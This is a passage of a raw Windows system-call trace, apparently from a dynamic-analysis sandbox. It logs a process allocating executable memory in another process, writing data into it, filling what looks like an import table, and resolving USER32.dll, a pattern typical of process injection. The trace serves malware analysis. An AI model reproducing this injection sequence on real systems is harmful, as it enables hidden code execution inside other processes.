BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.454] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.454] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.454] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.520] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.520] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.520] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.520] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.520] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.521] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a158, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.521] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.521] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949b90*, NumberOfBytesToWrite=0x16, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949b90*, NumberOfBytesWritten=0x28df88*=0x16) returned 0x0 [0140.521] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.521] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.521] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.521] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.522] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.522] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.522] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.522] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.522] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.522] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.522] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20026, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.522] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.522] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a160, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.523] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.523] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949ba8*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949ba8*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0140.523] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.523] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.523] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.523] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.523] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.524] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.524] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.524] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.524] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.524] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.524] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.524] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.524] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a168, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.524] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.525] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949bc0*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949bc0*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.525] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.525] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.525] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.525] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.525] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.525] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.525] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.526] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.526] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.526] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.526] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.526] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.526] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a170, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.526] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.526] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949bd2*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949bd2*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0140.526] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.526] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.527] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.527] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.527] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.527] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.527] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.527] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.527] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.527] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.528] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.528] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.528] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a178, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.528] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x21, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.528] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949be2*, NumberOfBytesToWrite=0x9, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949be2*, NumberOfBytesWritten=0x28df88*=0x9) returned 0x0 [0140.528] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.528] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.529] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.529] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.529] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.529] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.529] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.529] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.530] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.530] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.530] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20019, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.530] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.530] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a180, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.530] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.530] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949bee*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949bee*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0140.531] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.531] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.531] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.531] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.531] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.532] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.532] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.532] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.532] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.532] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.532] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.532] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.532] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a188, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.533] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x26, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.533] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f82*, NumberOfBytesToWrite=0xe, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f82*, NumberOfBytesWritten=0x28df88*=0xe) returned 0x0 [0140.533] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.533] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.533] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.533] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.534] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.534] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.534] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.534] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.534] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.534] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.534] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001e, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.534] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.534] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a190, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.534] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x949cda, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="USER32.dll") returned 11 [0140.534] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.535] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x15) returned 0x0 [0140.535] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.537] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.537] 